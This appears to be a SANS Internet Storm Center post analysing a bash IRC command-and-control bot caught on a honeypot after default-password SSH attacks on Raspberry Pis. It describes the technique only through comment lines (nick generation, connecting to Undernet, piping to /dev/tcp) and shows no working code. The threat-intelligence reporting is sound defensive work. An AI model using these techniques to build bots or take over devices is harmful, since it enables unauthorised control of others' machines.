Last week, Brock Perry, one of our SANS.edu undergraduate students, came across a neat bash script uploaded to the honeypot as part of an attack. I am sure this isn't new, but I never quite saw something like this before myself.
The bash script implements a basic IRC-based command and control channel, all in bash. It even verifies commands using digital signatures. The attack targeted Raspberry Pis via SSH using the default password. Raspberry Pis have not enabled ssh by default in years, but I guess there are still some out here that have not been taken over yet. Brock put together an excellent graphic illustrating the attack:
But the real gem here is the "$BOT" bash script which is part of the green section in the diagram. I added comments to the script below.
# use the letter "a" followed by the last few digits of the md5sum of "uname -a" as IRC NICK.
# connect to a random Undernet server
# poor man's Netcat, just pipe to /dev/tcp
I am sure this code isn't very robust, and I will not "ding" them on using MD5. It is probably good enough, and I always appreciate a neat tight bash script. Thanks to whoever wrote this to entertain me. (and thanks to Brock for finding this)Application Security: Securing Web Apps, APIs, and Microservices - SANS San Francisco Winter 2022
Aug 30th 2022
|Thread locked Subscribe||
Aug 30th 2022
1 month ago